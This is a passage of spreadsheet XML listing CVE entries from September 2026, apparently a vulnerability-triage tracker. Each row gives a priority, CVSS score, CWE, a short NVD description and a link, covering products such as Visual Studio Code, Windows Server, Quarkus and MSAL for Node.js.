      <c r="P795" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q795" s="5" t="inlineStr"/>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S795" s="5" t="inlineStr">
        <is>
          <t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t>
        </is>
      </c>
      <c r="T795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79575</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q796" s="5" t="inlineStr"/>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S796" s="5" t="inlineStr">
        <is>
          <t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t>
        </is>
      </c>
      <c r="T796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81355</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q797" s="5" t="inlineStr"/>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S797" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81381</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q798" s="5" t="inlineStr"/>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S798" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81790</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q799" s="5" t="inlineStr"/>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S799" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t>
        </is>
      </c>
      <c r="T799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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00" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q800" s="5" t="inlineStr"/>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S800" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84001</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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01" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q801" s="5" t="inlineStr"/>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S801" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85400</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q802" s="5" t="inlineStr"/>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-862</t>
        </is>
      </c>
      <c r="S802" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86075</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q803" s="5" t="inlineStr"/>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S803"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803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86711</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q804" s="5" t="inlineStr"/>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="S804" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86721</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>7.5</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2026-09-08</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q805" s="5" t="inlineStr"/>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S805" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86728</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>7.5</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2026-09-08</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q806" s="5" t="inlineStr"/>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S806" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19651</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q807" s="5" t="inlineStr"/>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S807" s="5" t="inlineStr">
        <is>
          <t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t>
        </is>
      </c>
      <c r="T807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69347</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q808" s="5" t="inlineStr"/>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S808" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71375</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q809" s="5" t="inlineStr"/>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S809" s="5" t="inlineStr">
        <is>
          <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T809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76196</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop_mobile</t>
        </is>
      </c>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q810" s="5" t="inlineStr"/>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S810" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q811" s="5" t="inlineStr"/>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S811" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81383</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q812" s="5" t="inlineStr"/>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S812" s="5" t="inlineStr">
        <is>
          <t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure\/msal-node</t>
        </is>
      </c>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q813" s="5" t="inlineStr"/>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S813" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
